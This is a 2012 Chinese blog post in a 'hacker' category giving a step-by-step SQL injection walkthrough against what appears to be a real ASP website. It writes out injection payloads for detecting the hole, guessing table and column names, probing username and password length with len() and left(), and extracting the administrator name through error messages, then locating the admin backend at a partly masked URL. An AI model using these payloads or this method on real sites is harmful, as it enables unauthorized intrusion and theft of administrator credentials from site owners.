加载中…
个人资料
追求绿茵
追求绿茵
  • 博客等级:
  • 博客积分:0
  • 博客访问:63,802
  • 关注人气:24
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
正文 字体大小:

利用网站报错获取网站管理员账号和密码

(2012-06-27 12:56:55)
标签:

b2

管理后台

b6

ad9

4a

杂谈

分类: 黑客

1.判断有无注入点
; and 1=1
网页正常

利用网站报错获取网站管理员账号和密码

and 1=2 网页返回不正常

 利用网站报错获取网站管理员账号和密码

2.猜表一般的表的名称无非是admin adminuser user pass password 等..

现在,进行一些测试,看不是为一些常见的表名

先试一试,是否有admin这张表的存在(常见的表名之一)
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin)

看到显示不正常,说明不存在此表利用网站报错获取网站管理员账号和密码

试一试是否有and 0<>(select count(*) from bas_user_login)

网页返回正常,说明存在bas_user_login表

利用网站报错获取网站管理员账号和密码


3、猜列名,看bas_user_login表是否存在password,发现并不存在列名为Password

利用网站报错获取网站管理员账号和密码




看bas_user_login表是否存在user_password,发现存在


利用网站报错获取网站管理员账号和密码

再看看bas_user_login表是否存在用户名,name的列

发现,并不存在name的列

利用网站报错获取网站管理员账号和密码

再看看bas_user_login表是否存在用户名,user_name的列

发现,并存在user_name的列



利用网站报错获取网站管理员账号和密码

4,测试一下,user_name的长度,

and 1=(select count(*) from bas_user_login where len(user_name)>0) 网页返回正常

利用网站报错获取网站管理员账号和密码

and 1=(select count(*) from bas_user_login where len(user_name)>5) 网页返回不正常,说明,user_name的长度在0=<和<=5之间


利用网站报错获取网站管理员账号和密码

and 1=(select count(*) from bas_user_login where len(user_name)>2) 网页返回正常,说明,user_name的长度在2<和<=5之间



利用网站报错获取网站管理员账号和密码

and 1=(select count(*) from bas_user_login where len(user_name)>3) 网页返回不正常,说明,user_name的长度在2<和<=3之间



利用网站报错获取网站管理员账号和密码

and 1=(select count(*) from bas_user_login where len(user_name)=3) 网页返回正常,说明,user_name的长度3


利用网站报错获取网站管理员账号和密码

5、利用其

网站设计时的不严谨,从反馈错误信息中得出账号名

and 1=(select count(*) from bas_user_login where left(user_name,1)>0)从中你可以看出爆出了‘管’

利用网站报错获取网站管理员账号和密码



利用网站报错获取网站管理员账号和密码

从中你可以看出爆出了‘管理员’



利用网站报错获取网站管理员账号和密码



 6/猜用户密码

利用网站报错获取网站管理员账号和密码



利用网站报错获取网站管理员账号和密码



利用网站报错获取网站管理员账号和密码



利用网站报错获取网站管理员账号和密码



利用网站报错获取网站管理员账号和密码

从上面可以猜测到user_password的长度为9



利用网站报错获取网站管理员账号和密码

利用其网站设计时的不严谨,从反馈错误信息中得出账号名
知道user_password的长度为9,猜user_password内容中的第一个内容


利用网站报错获取网站管理员账号和密码



利用网站报错获取网站管理员账号和密码



利用网站报错获取网站管理员账号和密码

知道user_password的长度为9,猜user_password内容中的如下

利用网站报错获取网站管理员账号和密码



7/查找其

管理后台:

 先用手工试了一下,常见的管理后台,发现不行

利用网站报错获取网站管理员账号和密码



http://wwXXXXX/admin/default.asp

利用网站报错获取网站管理员账号和密码




利用网站报错获取网站管理员账号和密码

利用网站报错获取网站管理员账号和密码






0

阅读 收藏 喜欢 打印举报/Report
  

新浪BLOG意见反馈留言板 欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 产品答疑

新浪公司 版权所有